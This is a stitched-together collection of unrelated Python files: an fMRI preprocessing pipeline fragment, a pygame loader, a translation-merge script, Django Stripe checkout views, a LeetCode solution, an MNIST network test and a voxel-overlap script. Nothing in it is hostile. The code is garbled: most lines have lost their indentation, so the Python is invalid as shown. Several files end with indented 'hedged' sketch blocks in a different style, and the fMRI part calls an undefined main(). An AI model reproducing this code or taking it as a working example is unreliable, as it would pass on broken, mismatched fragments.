# Let's do a band pass filtering on the data using the code from https://neurostars.org/t/bandpass-filtering-different-outputs-from-fsl-and-nipype-custom-function/824/2
### AFNI
bandpass = Node(afni.Bandpass(highpass=0.008, lowpass=0.08,
despike=False, no_detrend=True, notrans=True,
outputtype='NIFTI_GZ'),name='bandpass')
def save_file_list_function_in_brain(in_brain):
import numpy as np
import os
from os.path import join as opj
file_list = np.asarray(in_brain)
print('######################## File List ######################: \n',file_list)
np.save('brain_file_list',file_list)
file_name = 'brain_file_list.npy'
# out_brain = opj(os.getcwd(),file_name) # path
out_brain = os.path.abspath(file_name)
return out_brain
def save_file_list_function_in_mask(in_mask):
import numpy as np
import os
from os.path import join as opj
file_list2 = np.asarray(in_mask)
print('######################## File List ######################: \n',file_list2)
np.save('mask_file_list',file_list2)
file_name2 = 'mask_file_list.npy'
# out_mask = opj(os.getcwd(),file_name2) # path
out_mask = os.path.abspath(file_name2)
return out_mask
def save_file_list_function_in_motion_params(in_motion_params):
import numpy as np
import os
from os.path import join as opj
file_list3 = np.asarray(in_motion_params)
print('######################## File List ######################: \n',file_list3)
np.save('motion_params_file_list',file_list3)
file_name3 = 'motion_params_file_list.npy'
# out_motion_params = opj(os.getcwd(),file_name3) # path
out_motion_params = os.path.abspath(file_name3)
return out_motion_params
def save_file_list_function_in_motion_outliers(in_motion_outliers):
import numpy as np
import os
from os.path import join as opj
file_list4 = np.asarray(in_motion_outliers)
print('######################## File List ######################: \n',file_list4)
np.save('motion_outliers_file_list',file_list4)
file_name4 = 'motion_outliers_file_list.npy'
# out_motion_outliers = opj(os.getcwd(),file_name4) # path
out_motion_outliers = os.path.abspath(file_name4)
return out_motion_outliers
def save_file_list_function_in_joint_xformation_matrix(in_joint_xformation_matrix):
import numpy as np
import os
from os.path import join as opj
file_list5 = np.asarray(in_joint_xformation_matrix)
print('######################## File List ######################: \n',file_list5)
np.save('joint_xformation_matrix_file_list',file_list5)
file_name5 = 'joint_xformation_matrix_file_list.npy'
# out_joint_xformation_matrix = opj(os.getcwd(),file_name5) # path
out_joint_xformation_matrix = os.path.abspath(file_name5)
return out_joint_xformation_matrix
def save_file_list_function_in_tr(in_tr):
import numpy as np
import os
from os.path import join as opj
tr_list = np.asarray(in_tr)
print('######################## TR List ######################: \n',tr_list)
np.save('tr_list',tr_list)
file_name6 = 'tr_list.npy'
# out_tr = opj(os.getcwd(),file_name6) # path
out_tr = os.path.abspath(file_name6)
return out_tr
def save_file_list_function_in_atlas(in_atlas):
import numpy as np
import os
from os.path import join as opj
file_list7 = np.asarray(in_atlas)
print('######################## File List ######################: \n',file_list7)
np.save('atlas_file_list',file_list7)
file_name7 = 'atlas_file_list.npy'
# out_atlas = opj(os.getcwd(),file_name7) # path
out_atlas = os.path.abspath(file_name7)
return out_atlas
def save_file_list_function_in_confound_masks(in_csf_mask, in_wm_mask):
import numpy as np
import os
from os.path import join as opj
file_list8 = np.asarray(in_csf_mask)
print('######################## File List ######################: \n',file_list8)
np.save('csf_mask_file_list',file_list8)
file_name8 = 'csf_mask_file_list.npy'
# out_csf_mask = opj(os.getcwd(),file_name8) # path
out_csf_mask = os.path.abspath(file_name8)
file_list9 = np.asarray(in_wm_mask)
print('######################## File List ######################: \n',file_list9)
np.save('wm_mask_file_list',file_list9)
file_name9 = 'wm_mask_file_list.npy'
# out_wm_mask = opj(os.getcwd(),file_name9) # path
out_wm_mask = os.path.abspath(file_name9)
return out_csf_mask, out_wm_mask
def func_create_qc_csv(in_dict):
import pandas as pd
import os
from os.path import join as opj
import numpy as np
df = pd.DataFrame()
dict_list = np.asarray(in_dict)
for dict in dict_list:
_df = pd.DataFrame(dict)
df = df.append(_df)
print('########## DataFrame ########',df)
file_name = 'qc.csv'
df.to_csv(file_name,index=False)
# qc_csv = opj(os.getcwd(),file_name) # path
qc_csv = os.path.abspath(file_name)
return qc_csv
save_file_list_in_brain = JoinNode(Function(function=save_file_list_function_in_brain, input_names=['in_brain'],
output_names=['out_brain']),
joinsource="infosource",
joinfield=['in_brain'],
name="save_file_list_in_brain")
save_file_list_in_mask = JoinNode(Function(function=save_file_list_function_in_mask, input_names=['in_mask'],
output_names=['out_mask']),
joinsource="infosource",
joinfield=['in_mask'],
name="save_file_list_in_mask")
save_file_list_in_motion_outliers = JoinNode(Function(function=save_file_list_function_in_motion_outliers, input_names=['in_motion_outliers'],
output_names=['out_motion_outliers']),
joinsource="infosource",
joinfield=['in_motion_outliers'],
name="save_file_list_in_motion_outliers")
save_file_list_in_motion_params = JoinNode(Function(function=save_file_list_function_in_motion_params, input_names=['in_motion_params'],
output_names=['out_motion_params']),
joinsource="infosource",
joinfield=['in_motion_params'],
name="save_file_list_in_motion_params")
save_file_list_in_joint_xformation_matrix = JoinNode(Function(function=save_file_list_function_in_joint_xformation_matrix, input_names=['in_joint_xformation_matrix'],
output_names=['out_joint_xformation_matrix']),
joinsource="infosource",
joinfield=['in_joint_xformation_matrix'],
name="save_file_list_in_joint_xformation_matrix")
save_file_list_in_tr = JoinNode(Function(function=save_file_list_function_in_tr, input_names=['in_tr'],
output_names=['out_tr']),
joinsource="infosource",
joinfield=['in_tr'],
name="save_file_list_in_tr")
save_file_list_in_atlas = JoinNode(Function(function=save_file_list_function_in_atlas, input_names=['in_atlas'],
output_names=['out_atlas']),
joinsource="infosource",
joinfield=['in_atlas'],
name="save_file_list_in_atlas")
save_file_list_in_confound_masks = JoinNode(Function(function=save_file_list_function_in_confound_masks, input_names=['in_csf_mask', 'in_wm_mask'],
output_names=['out_csf_mask', 'out_wm_mask']),
joinsource="infosource",
joinfield=['in_csf_mask', 'in_wm_mask'],
name="save_file_list_in_confound_masks")
save_qc_csv = JoinNode(Function(function=func_create_qc_csv, input_names=['in_dict'],
output_names=['qc_csv']),
joinsource="infosource",
joinfield=['in_dict'],
name="save_qc_csv")
# ### Motion outliers
motionOutliers = Node(MotionOutliers(no_motion_correction=False,metric='fd', out_metric_plot = 'fd_plot.png',
out_metric_values='fd_raw.txt'),name='motionOutliers')
# -------------------------FAST -----------------------------------------------------------------------------------------------------
if DO_FAST:
wf_confound_masks = wfm.get_wf_main(name='wf_main_masks')
wf_confound_masks.inputs.inputspec.brain_mask_eroded = \
'/mnt/project1/home1/varunk/fMRI/Autism-Connectome-Analysis/tissuepriors/brain_mask_2mm_eroded_18mm.nii.gz'
wf_confound_masks.inputs.inputspec.threshold = 0.5
wf_confound_masks.inputs.inputspec.csf_tissue_prior_path =\
'/mnt/project1/home1/varunk/fMRI/Autism-Connectome-Analysis/tissuepriors/created_tissue_priors/csf_prior_mask.nii.gz'
wf_confound_masks.inputs.inputspec.wm_tissue_prior_path =\
'/mnt/project1/home1/varunk/fMRI/Autism-Connectome-Analysis/tissuepriors/created_tissue_priors/wm_prior_mask.nii.gz'
# ----------------------------No FAST -----------------------------------------------------------
# TODO
if not DO_FAST:
wf_confound_masks = wftp.get_wf_tissue_priors(name='get_wf_tissue_priors')
wf_confound_masks.inputs.inputspec.csf_tissue_prior_path =\
'/mnt/project1/home1/varunk/fMRI/Autism-Connectome-Analysis/tissuepriors/created_tissue_priors/csf_prior_mask.nii.gz'
wf_confound_masks.inputs.inputspec.wm_tissue_prior_path =\
'/mnt/project1/home1/varunk/fMRI/Autism-Connectome-Analysis/tissuepriors/created_tissue_priors/wm_prior_mask.nii.gz'
wf_confound_masks.inputs.inputspec.threshold = 0.5
# wf_confound_masks.inputs.inputspec.reference_func_file_path =
# wf_confound_masks.inputs.inputspec.std2func_mat_path =
# ## Workflow for atlas registration from std to functional
wf_atlas_resize_reg = Workflow(name=atlas_resize_reg_directory)
wf_coreg_reg_to_wf_confound_masks = Node(IdentityInterface(fields=['reference_func_file_path', 'resampled_anat_file_path', 'func2anat_mat_path']),
name="wf_coreg_reg_to_wf_confound_masks")
# Apply the inverse matrix to the 3mm Atlas to transform it to func space
wf_atlas_resize_reg.connect(maskfunc4mean, 'out_file', std2func_xform, 'reference')
wf_atlas_resize_reg.connect(resample_atlas, 'out_file', std2func_xform,'in_file')
# Now, applying the inverse matrix
wf_atlas_resize_reg.connect(inv_mat, 'out_file', std2func_xform ,'in_matrix_file') # output: Atlas in func space
wf_atlas_resize_reg.connect(std2func_xform, 'out_file', save_file_list_in_atlas,'in_atlas')
wf_atlas_resize_reg.connect(inv_mat, 'out_file', wf_confound_masks, 'inputspec.std2func_mat_path')
# Sending to wf_confound_masks
wf_atlas_resize_reg.connect(wf_coreg_reg_to_wf_confound_masks,'reference_func_file_path', wf_confound_masks, 'inputspec.reference_func_file_path')
if DO_FAST:
wf_atlas_resize_reg.connect(wf_coreg_reg_to_wf_confound_masks,'resampled_anat_file_path', wf_confound_masks, 'inputspec.resampled_anat_file_path')
wf_atlas_resize_reg.connect(wf_coreg_reg_to_wf_confound_masks,'func2anat_mat_path', wf_confound_masks, 'inputspec.func2anat_mat_path')
# Creating and saving the QC CSV
wf_atlas_resize_reg.connect(wf_confound_masks,'outputspec.qc_stats_dict', save_qc_csv, 'in_dict')
wf_atlas_resize_reg.connect(save_qc_csv, 'qc_csv', dataSink, 'qc_csv.@qc_csv')
# Getting the outputs from wf_confound_masks workflow
wf_atlas_resize_reg.connect(wf_confound_masks, 'outputspec.csf_tissue_prior_path',
save_file_list_in_confound_masks, 'in_csf_mask' )
wf_atlas_resize_reg.connect(wf_confound_masks, 'outputspec.wm_tissue_prior_path',
save_file_list_in_confound_masks, 'in_wm_mask' )
wf_atlas_resize_reg.connect(save_file_list_in_confound_masks, 'out_csf_mask', dataSink, 'csf_mask_paths.@out_csf_tissue_prior_mask')
wf_atlas_resize_reg.connect(save_file_list_in_confound_masks, 'out_wm_mask', dataSink, 'wm_mask_paths.@out_wm_tissue_prior_mask')
# ---------------------------Save the required files --------------------------------------------
# wf_atlas_resize_reg.connect([(save_file_list_in_motion_params, dataSink, [('out_motion_params','motion_params_paths.@out_motion_params')])])
# if motionOutliersOption == 1:
# wf_atlas_resize_reg.connect([(save_file_list_in_motion_outliers, dataSink, [('out_motion_outliers','motion_outliers_paths.@out_motion_outliers')])])
# Move the below statements to the respective workflows
# Lesson learnt: A node inside a workflow (let's say WF_1) is not a global entity. That is, to direct the output of that node to a datasink (which is a global entity), the .connect() should
# be written in that workflow only; it will not work if .connect() is written in some other workflow.
"""
Lesson learnt: (Specific to nested workflows)
A node (let's say N_1) inside a workflow (let's say WF_1) is
not a global entity. That is, to direct the output of that node (N_1) to
a datasink (which is a global entity), the
.connect(N_1, 'Output' ,DataSink, 'Input') should be written in that
workflow only, i.e. WF_1.connect(N_1, 'Output' ,DataSink, 'Input').
And will not work if .connect(N_1,_,_,_) is written in some other
workflow. I was writing all the datasink .connect() statements in a
different workflow that was nested in WF_1.
"""
# wf_atlas_resize_reg.connect([(save_file_list_in_brain, dataSink, [('out_brain','preprocessed_brain_paths.@out_brain')])])
# wf_atlas_resize_reg.connect([(save_file_list_in_mask, dataSink, [('out_mask','preprocessed_mask_paths.@out_mask')])])
# wf_atlas_resize_reg.connect([(save_file_list_in_joint_xformation_matrix, dataSink, [('out_joint_xformation_matrix',
# 'joint_xformation_matrix_paths.@out_joint_xformation_matrix')])])
# wf_atlas_resize_reg.connect([(save_file_list_in_tr, dataSink, [('out_tr','tr_paths.@out_tr')])])
wf_atlas_resize_reg.connect([(save_file_list_in_atlas, dataSink, [('out_atlas','atlas_paths.@out_atlas')])])
# In[909]:
wf_coreg_reg = Workflow(name=coreg_reg_directory)
# wf_coreg_reg.base_dir = base_directory
# Dir where all the outputs will be stored(inside coregistrationPipeline folder).
wf_motion_correction_bet_to_wf_confound_masks = Node(IdentityInterface(fields=['reference_func_file_path']),
name="wf_motion_correction_bet_to_wf_confound_masks")
if ANAT == 1:
wf_coreg_reg.connect(BIDSDataGrabber,'anat_file_path',skullStrip,'in_file') # Resampled the anat file to 3mm
wf_coreg_reg.connect(skullStrip,'out_file', resample_anat,'in_file')
wf_coreg_reg.connect(resample_anat,'out_file', func2anat_reg,'reference') # Make the resampled file as reference in func2anat_reg
# Sec 1. The above 3 steps register the mean image to the resampled anat image and
# calculate the transformation matrix (which I hope gets saved as well)
wf_coreg_reg.connect(MNI152_2mm, 'standard_file', resample_mni,'in_file')
wf_coreg_reg.connect(resample_mni, 'out_file', anat2std_reg,'reference')
wf_coreg_reg.connect(resample_anat, 'out_file', anat2std_reg, 'in_file')
# Calculates the Xformationmatrix from anat3mm to MNI 3mm
# We can get those matrices by referring to func2anat_reg.outputs.out_matrix_file and similarly for anat2std_reg
wf_coreg_reg.connect(func2anat_reg, 'out_matrix_file', concat_xform,'in_file')
wf_coreg_reg.connect(anat2std_reg, 'out_matrix_file', concat_xform,'in_file2')
wf_coreg_reg.connect(concat_xform, 'out_file', dataSink, 'tranformation_matrix_fun2std.@out_file')
wf_coreg_reg.connect(concat_xform, 'out_file', save_file_list_in_joint_xformation_matrix, 'in_joint_xformation_matrix')
# Now inverse the func2std MAT to std2func
wf_coreg_reg.connect(concat_xform, 'out_file', wf_atlas_resize_reg,'inv_mat.in_file')
# For the extraction of the confound masks
wf_coreg_reg.connect(resample_anat, 'out_file', wf_coreg_reg_to_wf_confound_masks, 'resampled_anat_file_path')
wf_coreg_reg.connect(func2anat_reg, 'out_matrix_file', wf_coreg_reg_to_wf_confound_masks, 'func2anat_mat_path')
wf_coreg_reg.connect(wf_motion_correction_bet_to_wf_confound_masks, 'reference_func_file_path', wf_coreg_reg_to_wf_confound_masks, 'reference_func_file_path')
# Registration of Functional to MNI 3mm space w/o using anatomical
if ANAT == 0:
print('Not using Anatomical high resolution files')
wf_coreg_reg.connect(MNI152_2mm, 'standard_file', resample_mni,'in_file')
wf_coreg_reg.connect(resample_mni, 'out_file',func2anat_reg,'reference') # Make the resampled file as reference in func2anat_reg
wf_coreg_reg.connect(func2anat_reg, 'out_matrix_file', dataSink, 'tranformation_matrix_fun2std.@out_file')
wf_coreg_reg.connect(func2anat_reg, 'out_matrix_file', save_file_list_in_joint_xformation_matrix, 'in_joint_xformation_matrix')
# Now inverse the func2std MAT to std2func
wf_coreg_reg.connect(func2anat_reg, 'out_matrix_file', wf_atlas_resize_reg,'inv_mat.in_file')
wf_coreg_reg.connect(
save_file_list_in_joint_xformation_matrix, 'out_joint_xformation_matrix',
dataSink, 'joint_xformation_matrix_paths.@out_joint_xformation_matrix')
# ## Co-Registration, Normalization and Bandpass Workflow
# 1. Co-registration means aligning the func to anat
# 2. Normalization means aligning func/anat to standard
# 3. Applied band pass filtering in range - highpass=0.008, lowpass=0.08
# In[910]:
wf_motion_correction_bet = Workflow(name=motion_correction_bet_directory)
# wf_motion_correction_bet.base_dir = base_directory
wf_motion_correction_bet.connect([
(from_mcflirt, meanfunc, [('in_file','in_file')]),
(meanfunc, meanfuncmask, [('out_file','in_file')]),
(from_mcflirt,applyMask , [('in_file','in_file')]), # 1
(meanfuncmask, applyMask, [('mask_file','in_file2')]), # 2 output: 1&2, BET on coregistered fmri scan
(meanfunc, maskfunc4mean, [('out_file', 'in_file')]), # 3
(meanfuncmask, maskfunc4mean, [('mask_file','in_file2')]), # 4 output: 3&4, BET on mean func scan
(applyMask, save_file_list_in_brain, [('out_file', 'in_brain')]),
(applyMask, save_file_list_in_mask, [('out_file2', 'in_mask')]),
(save_file_list_in_brain, dataSink, [('out_brain','preprocessed_brain_paths.@out_brain1')]),
(save_file_list_in_mask, dataSink, [('out_mask','preprocessed_mask_paths.@out_mask')]),
(maskfunc4mean, wf_coreg_reg, [('out_file','func2anat_reg.in_file')]),
(applyMask, wf_coreg_reg, [('out_file', 'wf_motion_correction_bet_to_wf_confound_masks.reference_func_file_path')])
# -----------------------------------------------------------
# Connect maskfunc4mean node to FSL:FAST
# and extract the GM, WM and CSF masks.
# maskfunc4mean.out_file is the skull-stripped mean functional file of a subject
# in the subject space, after the fMRI file has been motion corrected (realigned) by MCFLIRT.
# Then save the masks and then save the file lists as well.
# -----------------------------------------------------------
])
infosource = Node(IdentityInterface(fields=['subject_id']),
name="infosource")
infosource.iterables = [('subject_id',subject_list)]
# Create the workflow
wf = Workflow(name=parent_wf_directory)
# base_dir = opj(s,'result')
wf.base_dir = base_directory # Dir where all the outputs will be stored(inside BETFlow folder).
# wf.connect([ (infosource, BIDSDataGrabber, [('subject_id','subject_id')]),
# (BIDSDataGrabber, extract, [('func_file_path','in_file')]),
#
# (BIDSDataGrabber,getMetadata, [('func_file_path','in_file')]),
#
# (getMetadata,slicetimer, [('tr','time_repetition')]),
#
#
# (getMetadata,slicetimer, [('index_dir','index_dir')]),
#
# (getMetadata,slicetimer, [('interleaved','interleaved')]),
#
# (getMetadata,save_file_list_in_tr, [('tr','in_tr')]),
#
# (extract,slicetimer,[('roi_file','in_file')]),
#
# (slicetimer, mcflirt,[('slice_time_corrected_file','in_file')])
# (mcflirt,dataSink,[('par_file','motion_params.@par_file')]), # saves the motion parameters calculated before
#
# (mcflirt,save_file_list_in_motion_params,[('par_file','in_motion_params')]),
#
# (mcflirt,wf_motion_correction_bet,[('out_file','from_mcflirt.in_file')])
# ])
# # Run it in parallel
# wf.run('MultiProc', plugin_args={'n_procs': num_proc})
#
#
#
# # Visualize the detailed graph
# # from IPython.display import Image
# wf.write_graph(graph2use='flat', format='png', simple_form=True)
# ANAT = 0
nodes = [extract, slicetimer,motionOutliers, mcflirt]
wf.connect(infosource,'subject_id', BIDSDataGrabber,'subject_id')
wf.connect(BIDSDataGrabber, 'func_file_path', getMetadata, 'in_file')
wf.connect(getMetadata, 'tr', save_file_list_in_tr,'in_tr')
wf.connect(save_file_list_in_tr,'out_tr', dataSink,'tr_paths.@out_tr')
old_node = BIDSDataGrabber
old_node_output = 'func_file_path'
for idx, include in enumerate(options_binary_string):
if old_node == extract :
old_node_output = 'roi_file'
elif old_node == slicetimer:
old_node_output = 'slice_time_corrected_file'
# elif old_node == mcflirt:
# old_node_output = 'out_file'
if int(include):
new_node = nodes[idx]
if new_node == slicetimer:
wf.connect(getMetadata,'tr',slicetimer,'time_repetition')
wf.connect(getMetadata,'index_dir',slicetimer, 'index_dir')
wf.connect(getMetadata,'interleaved',slicetimer,'interleaved')
new_node_input = 'in_file'
elif new_node == extract:
new_node_input = 'in_file'
elif new_node == mcflirt:
new_node_input = 'in_file'
wf.connect(mcflirt,'par_file',dataSink,'motion_params.@par_file') # saves the motion parameters calculated before
wf.connect(mcflirt,'par_file',
save_file_list_in_motion_params, 'in_motion_params')
wf.connect(save_file_list_in_motion_params, 'out_motion_params',
dataSink, 'motion_params_paths.@out_motion_params')
wf.connect(mcflirt, 'out_file',
wf_motion_correction_bet, 'from_mcflirt.in_file')
elif new_node == motionOutliers:
wf.connect(meanfuncmask, 'mask_file',
motionOutliers,'mask')
wf.connect(motionOutliers, 'out_file',
dataSink,'motionOutliers.@out_file')
wf.connect(motionOutliers, 'out_metric_plot',
dataSink,'motionOutliers.@out_metric_plot')
wf.connect(motionOutliers, 'out_metric_values',
dataSink,'motionOutliers.@out_metric_values')
wf.connect(motionOutliers, 'out_file',
save_file_list_in_motion_outliers,'in_motion_outliers')
wf.connect(
save_file_list_in_motion_outliers, 'out_motion_outliers',
dataSink, 'motion_outliers_paths.@out_motion_outliers')
new_node_input = 'in_file'
wf.connect(old_node, old_node_output, new_node, new_node_input)
continue
wf.connect(old_node, old_node_output, new_node, new_node_input)
old_node = new_node
else:
if idx == 3: # If No Node is attached till the end
# new_node = from_mcflirt
# new_node_input = 'from_mcflirt.in_file'
wf.connect(old_node, old_node_output, wf_motion_correction_bet,'from_mcflirt.in_file')
# old_node = new_node
TEMP_DIR_FOR_STORAGE = opj(base_directory,'crash_files')
wf.config = {"execution": {"crashdump_dir": TEMP_DIR_FOR_STORAGE}}
# Visualize the detailed graph
# from IPython.display import Image
wf.write_graph(graph2use='flat', format='png', simple_form=True)
# Run it in parallel
wf.run('MultiProc', plugin_args={'n_procs': num_proc})
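# ---------------------------------------------------------------------------
# Hedged usage sketch (all paths below are placeholders, not real data): main()
# expects a dict of paths plus a 4-character options string whose digits switch
# on, in order, dummy-volume removal, slice-time correction, motion-outlier
# detection, and motion correction; ANAT=1 means anatomical scans are available.
if __name__ == '__main__':
    example_paths = {
        'json_path': '/data/bids/task-rest_bold.json',
        'base_directory': '/results',
        'parent_wf_directory': 'preprocessPipeline',
        'motion_correction_bet_directory': 'motionCorrectionBETFlow',
        'coreg_reg_directory': 'coregistrationPipeline',
        'atlas_resize_reg_directory': 'atlasResizeRegistrationPipeline',
        'datasink_name': 'datasink_preprocessed',
        'subject_list': ['0050002', '0050003'],
        'data_directory': '/data/bids',
        'atlasPath': '/atlases/atlas_3mm.nii.gz',
    }
    main(example_paths, options_binary_string='1111', ANAT=1, DO_FAST=False, num_proc=4)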
|
import os, sys, pygame
from pygame.locals import *
def load_image(fileName, colorkey=None):
image = pygame.image.load(fileName).convert()
if colorkey is not None:
if colorkey == -1:
colorkey = image.get_at((0,0)) # set colorkey to top-left pixel of image
image.set_colorkey(colorkey, RLEACCEL)
return image, image.get_rect() # return the image and the hitbox
def load_sound(fileName):
sound = pygame.mixer.Sound(fileName)
return sound
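# ---------------------------------------------------------------------------
# Hedged usage sketch ('player.png' and 'jump.wav' are hypothetical assets):
# load_image() calls convert(), which needs a display surface to exist first.
if __name__ == '__main__':
    pygame.init()
    screen = pygame.display.set_mode((640, 480))
    player_img, player_rect = load_image('player.png', colorkey=-1)
    jump_sound = load_sound('jump.wav')
    screen.blit(player_img, player_rect)
    pygame.display.flip()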
|
#!/usr/bin/env python
import os
import polib
LOCALES = [
"br",
"cs",
"de",
"el",
"es",
"fi",
"fr",
"it",
"ja",
"nl",
"pt",
"pt-br",
"pl",
"po",
"ru",
"sv",
"tr",
"zh-hant",
]
OLD_TRANSLATION_MODULES = [
"",
"admin",
"dnstools",
"ldapsync",
"limits",
"maillog",
"policyd",
"relaydomains",
"transport",
"dmarc",
]
def merge_translations():
for locale in LOCALES:
target = f"locale/{locale}/LC_MESSAGES/app.po"
print(f"Opening {target}")
new_po = polib.pofile(target)
for module in OLD_TRANSLATION_MODULES:
prefix = f"../modoboa/{module}" if module else "../modoboa"
old_file = f"{prefix}/locale/{locale}/LC_MESSAGES/django.po"
if not os.path.exists(old_file):
continue
print(f"Opening {old_file}")
old_po = polib.pofile(old_file)
for entry in new_po:
old_entry = old_po.find(entry.msgid)
if old_entry:
entry.msgstr = old_entry.msgstr
new_po.save()
if __name__ == "__main__":
merge_translations()
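# ---------------------------------------------------------------------------
# Hedged variant (not part of the original script): polib entries can also carry
# plural forms and "fuzzy" flags. A slightly more careful merge could skip fuzzy
# old entries and copy plurals when present; sketch of that per-entry step:
def merge_entry(entry, old_po):
    old_entry = old_po.find(entry.msgid)
    if old_entry is None or 'fuzzy' in old_entry.flags:
        return
    entry.msgstr = old_entry.msgstr
    if old_entry.msgstr_plural:
        entry.msgstr_plural = dict(old_entry.msgstr_plural)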
|
from django.shortcuts import render
from django.conf import settings
from django.http.response import JsonResponse
from django.views.decorators.csrf import csrf_exempt
import stripe
from users.models import Order
@csrf_exempt
def stripe_config(request):
if request.method == 'GET':
stripe_config = {'publicKey': settings.STRIPE_PUBLISHABLE_KEY}
return JsonResponse(stripe_config, safe=False)
def create_checkout_session(request):
items_to_purchase = []
if request.user.is_authenticated:
for order_item in request.user.order.item.all():
item = {
'name': order_item.product.name,
'quantity': order_item.quantity,
'currency': 'cad',
'amount': order_item.product.serialized_price.replace('.', ''),
}
items_to_purchase.append(item)
else:
if 'cart' in request.session:
for key, order_item in request.session['cart'].items():
item = {
'name': order_item['product']['name'],
'quantity': order_item['quantity'],
'currency': 'cad',
'amount': order_item['product']['price'].replace('.', ''),
}
items_to_purchase.append(item)
if request.method == 'GET':
domain_url = 'https://lit-peak-45044.herokuapp.com'
stripe.api_key = settings.STRIPE_SECRET_KEY
try:
checkout_session = stripe.checkout.Session.create(
success_url=domain_url + '/payment/success?session_id={CHECKOUT_SESSION_ID}',
cancel_url=domain_url + '/payment/cancelled/',
payment_method_types=['card'],
mode='payment',
line_items=items_to_purchase
)
return JsonResponse({'sessionId': checkout_session['id']})
except Exception as e:
return JsonResponse({'error': str(e)})
def success(request):
user = request.user
if user.is_authenticated:
order = Order.objects.get(user=user)
order.completed = True
user.order.delete()
user.order = Order.objects.create(user=user)
else:
request.session['cart'] = {}
return render(request, 'payments/success.html')
def cancelled(request):
return render(request, 'payments/cancelled.html')
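# ---------------------------------------------------------------------------
# Hedged helper sketch (not wired into the views above): Stripe amounts are
# integer cents, and stripping the '.' from serialized_price only works when the
# price string always has exactly two decimals. A Decimal-based conversion is
# more robust; 'price_str' is an assumed argument name.
def to_cents(price_str):
    """'12.5' -> 1250, '12.50' -> 1250, '12' -> 1200."""
    from decimal import Decimal
    return int(Decimal(price_str) * 100)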
|
# -*- coding: utf-8 -*-
class Solution:
def minCostToMoveChips(self, chips):
# Moving a chip by 2 is free and moving by 1 costs 1, so the cheapest plan is to
# gather every chip on one parity; the answer is the smaller parity count.
count_even, count_odd = 0, 0
for chip in chips:
if chip % 2 == 0:
count_even += 1
else:
count_odd += 1
return min(count_even, count_odd)
if __name__ == "__main__":
solution = Solution()
assert 1 == solution.minCostToMoveChips([1, 2, 3])
assert 2 == solution.minCostToMoveChips([2, 2, 2, 3, 3])
|
"""
This is the file where I'll use everything I built to create a NN to do something (exact task still undecided)
"""
from NeuralNetwork import *
import numpy as np
import matplotlib.pyplot as plt
from Layer import *
from keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape((-1, 784))/255
x_test = x_test.reshape((-1, 784))/255
def categorize(j):
a = np.zeros((10, 1))
a[j] = 1
return a
y = []
for j in y_train:
y.append(categorize(j))
train = list(zip(x_train, y))
test = list(zip(x_test, y_test))
epochs = 20
alpha = 0.1
batch_size = 32
t = NeuralNetworkModel(784, 10)
t.add(Dense(64, "sigmoid"))
t.add(Dense(10, "sigmoid"))
# t.train(train, epochs, alpha, batch_size, test) # training the NN
# t.save("modeltest.txt")
""" Testing the save/load functions"""
n = NeuralNetworkModel(784, 10)
n.load("modeltest.txt")
result = 0
for x, y in test:
output = n.feedforward(x)
result += int(np.argmax(output) == y)
print("Accuracy: {0}".format(result / len(test) * 100))
""" The Results after running the NN:
On my laptop, with the above structure:
Epoch 1: 1716 / 10000
Epoch 2: 2849 / 10000
Epoch 3: 3964 / 10000
Epoch 4: 4184 / 10000
Epoch 5: 4299 / 10000
Epoch 6: 4606 / 10000
Epoch 7: 4968 / 10000
Epoch 8: 5094 / 10000
Epoch 9: 5160 / 10000
Epoch 10: 5205 / 10000
Epoch 11: 5243 / 10000
Epoch 12: 5276 / 10000
Epoch 13: 5303 / 10000
Epoch 14: 5317 / 10000
Epoch 15: 5330 / 10000
Epoch 16: 5339 / 10000
Epoch 17: 5350 / 10000
Epoch 18: 5358 / 10000
Epoch 19: 5366 / 10000
Epoch 20: 5373 / 10000
Process finished with exit code 0
In colab, with relu and sigmoid, 20 epochs
Epoch 1: 2588 / 10000
Epoch 2: 3056 / 10000
Epoch 3: 3530 / 10000
Epoch 4: 3880 / 10000
Epoch 5: 4169 / 10000
Epoch 6: 4359 / 10000
Epoch 7: 4556 / 10000
Epoch 8: 4716 / 10000
Epoch 9: 4866 / 10000
Epoch 10: 4992 / 10000
Epoch 11: 5103 / 10000
Epoch 12: 5231 / 10000
Epoch 13: 5334 / 10000
Epoch 14: 5446 / 10000
Epoch 15: 5545 / 10000
Epoch 16: 5649 / 10000
Epoch 17: 5772 / 10000
Epoch 18: 5884 / 10000
Epoch 19: 5990 / 10000
Epoch 20: 6103 / 10000
"""
|
from ddd.painter2 import *
from ddd.bresenham3 import *
import matplotlib
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
tree = Vine()
paint = Painter(tree)
paint.build_tree_set()
branches = paint.build_tree_set()
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1, projection='3d')
ax.set_xlim(-100, 100)
ax.set_ylim(-100, 100)
ax.set_zlim(0, 200)
plt.xlabel('x')
plt.ylabel('y')
cubes = []  # every voxel covered so far (renamed from `list` to avoid shadowing the built-in)
for branch in branches:
start = branch.start_point
end = branch.end_point
x = [start[0], end[0]]
y = [start[1], end[1]]
z = [start[2], end[2]]
#print(start[0],start[1],start[2])
#print(end[0],end[1],end[2])
point1=(int(start[0]),int(start[1]),int(start[2]))
point2=(int(end[0]),int(end[1]),int(end[2]))
cube_list=bresenham(point1, point2)
#print(cube_list)
new_cubes = 0  # voxels newly added by this branch
for i in cube_list:
if i in cubes:
print("Overlapping voxel:")
print(i)
print("Overlapping branch endpoints:")
print(point1, point2)
else:
cubes.append(i)
new_cubes += 1
if new_cubes != len(cube_list):
print("This rule is invalid")  # the branch re-uses voxels that are already occupied
print(cubes)
print(len(cubes))
#figure = ax.plot(x, y, z, c='r')
#plt.show()
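# ---------------------------------------------------------------------------
# Hedged alternative (not part of the original script): membership tests against
# a Python list are O(n); collecting the voxels in a set keeps the overlap check
# cheap. Sketch of the same bookkeeping, assuming bresenham() yields point-like
# sequences of three coordinates.
seen = set()
for branch in branches:
    p1 = tuple(int(branch.start_point[i]) for i in range(3))
    p2 = tuple(int(branch.end_point[i]) for i in range(3))
    voxels = [tuple(v) for v in bresenham(p1, p2)]
    overlaps = [v for v in voxels if v in seen]
    if overlaps:
        print("Overlapping voxels for branch", p1, p2, ":", overlaps)
    seen.update(voxels)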
|